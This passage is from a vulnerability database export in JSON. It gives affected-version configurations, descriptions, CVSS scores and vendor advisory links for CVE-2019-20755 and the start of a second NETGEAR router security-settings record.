"matchCriteriaId": "3B1C19D9-9195-4C24-B346-10AAC4106B89",
"versionEndExcluding": "1.0.9.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52A6DEB2-3A33-4184-866D-9C8D9DD991C6",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E59E66D2-7E73-45C8-8D3E-FE589CDBECA4",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94B3A9D8-A276-41B2-B7BF-7DA58B879A9B",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90805FFE-E59D-43D2-BF1E-D55458CF05BF",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "471E4F42-7114-4A7F-832D-2E9222BD25B4",
"versionEndExcluding": "1.0.2.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2D59690E-4182-40B0-872C-8392352C0B00",
"versionEndExcluding": "1.4.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9E0102F4-A45E-4715-8D3F-4DC96EC5865C",
"versionEndExcluding": "1.4.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6C5FC237-F74C-4771-B5D3-36CF245C0396",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "46D1F73B-1AE0-40AE-BED7-CAE3C7EFEE3B",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54EEBD4A-4734-4F43-B7D4-39D81C83A873",
"versionEndExcluding": "1.0.0.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "AB00ECAD-7474-4D85-8248-D014E5808814",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E338A30-C349-41B4-B971-E6D6B0E9AFE4",
"versionEndExcluding": "1.2.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3100rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7BD4DF32-99E8-4958-A220-B2578E3FA2D0",
"versionEndExcluding": "1.0.0.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3100rp:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA8678D2-8FFA-4C5C-B97D-19AE3456F7BC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6220 before 1.0.0.46, D6400 before 1.0.0.80, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v1 before 1.0.0.58, DGN2200B before 1.0.0.58, JNDR3000 before 1.0.0.24, RBW30 before 2.1.4.16, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.42, R6400v2 before 1.0.2.56, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.32, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7000P before 1.3.1.44, R7900 before 1.0.2.16, R8000P before 1.4.0.10, R7900P before 1.4.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R8000 before 1.0.4.18, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, WNR3500Lv2 before 1.2.0.54, WN3100RP before 1.0.0.20, and WN2500RPv2 before 1.0.1.54."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un usuario autenticado. Esto afecta a D6220 versiones anteriores a 1.0.0.46, D6400 versiones anteriores a 1.0.0.80, D7000v2 versiones anteriores a 1.0.0.51, D8500 versiones anteriores a 1.0.3.42, DGN2200v1 versiones anteriores a 1.0.0.58, DGN2200B versiones anteriores a 1.0.0.58, JNDR3000 versiones anteriores a 1.0.0. 24, RBW30 versiones anteriores a 2.1.4.16, R6250 versiones anteriores a 1.0.4.26, R6300v2 versiones anteriores a 1.0.4.28, R6400 versiones anteriores a 1.0.1.42, R6400v2 versiones anteriores a 1.0.2.56, R6700 versiones anteriores a 1.0.1.46, R6900 versiones anteriores a 1.0.1.46, R7000 versiones anteriores a 1.0.9. 32, R6900P versiones anteriores a 1.3.1.44, R7100LG versiones anteriores a 1.0.0.46, R7300DST versiones anteriores a 1.0.0.68, R7000P versiones anteriores a 1.3.1.44, R7900 versiones anteriores a 1.0.2.16, R8000P versiones anteriores a 1.4.0.10, R7900P versiones anteriores a 1.4.0.10, R8300 versiones anteriores a 1.0.2. 122, R8500 versiones anteriores a 1.0.2.122, R8000 versiones anteriores a 1.0.4.18, WNDR3400v3 versiones anteriores a 1.0.1.22, WNDR4500v2 versiones anteriores a 1.0.0.72, WNR3500Lv2 versiones anteriores a 1.2.0.54, WN3100RP versiones anteriores a 1.0.0.20, y WN2500RPv2 versiones anteriores a 1.0.1.54."
}
],
"id": "CVE-2019-20755",
"lastModified": "2024-11-21T04:39:16.770",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T22:15:12.930",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060627/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Extenders-and-Orbi-Satellites-PSV-2018-0053"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000060627/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Modem-Routers-Extenders-and-Orbi-Satellites-PSV-2018-0053"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-24 15:15
Modified
2024-11-21 04:03
Severity ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1., JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d1500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "47DB7AAC-5EE3-4912-A44F-C9D5BF42B01C",
"versionEndExcluding": "1.0.0.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d1500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "78DC8809-C26D-48D8-9E12-228C3669B824",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B5A5FCA-6198-4DF7-B395-F266C2B6270C",
"versionEndExcluding": "1.0.0.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE070E3-C0B1-455F-83A9-5C60C489816F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2ECEA129-164C-4C80-A81E-9688F4AC3583",
"versionEndExcluding": "1.0.0.57",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B8AA0851-BFD5-45F6-9673-CA4B83D8B844",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD763D04-70A0-4A50-8866-330B82703680",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB2B81-08D9-4C81-B6DE-8D1FCAEC485A",
"versionEndExcluding": "1.0.1.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB24F17D-A9A8-4EF9-BF53-580395D60EFC",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DA2D4987-3726-4A72-8D32-592F59FAC46D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FCA60A85-77FF-41BF-89FA-7EB3ACFECDB8",
"versionEndExcluding": "1.0.0.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5C27C8A-1B80-47CD-B015-14588F4F8732",
"versionEndExcluding": "1.0.0.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex2700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C309FEFF-5FB1-41BB-B9C5-97CFAC29892C",
"versionEndExcluding": "1.0.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex2700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5341B659-DE7D-43F1-954D-82049CBE18AD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B79CB764-3B62-4C39-9B68-A7C949EA91BE",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C578B9-6D52-492F-854F-067EB36F84B1",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "520E4E2B-FF48-4B11-8A41-975B1A5E9FA2",
"versionEndExcluding": "1.0.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4707A6F6-9586-47FF-8E1A-55D950D8CE19",
"versionEndExcluding": "1.0.2.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2AC81E61-E8CD-4929-A1E2-C1B620BCC3E7",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A5E1BEB0-8AA0-423B-A0A2-966341402819",
"versionEndExcluding": "1.0.0.34_1.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "46452E97-9347-4788-9570-1EECECC7255E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1C96EDAD-1985-4AB7-9FF1-C67A5D274C99",
"versionEndExcluding": "1.0.3.82_1.1.117",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "66120328-5681-46E5-86A5-CAC62B9243B9",
"versionEndExcluding": "1.0.1.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1289BBB4-1955-46A4-B5FE-BF11153C24F5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "274A58AC-3E28-411B-8495-2ADD184CFAE6",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07099566-F207-43C4-BCB0-09468E249888",
"versionEndExcluding": "1.0.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7300:-:*:*:*:*:*:*:*",
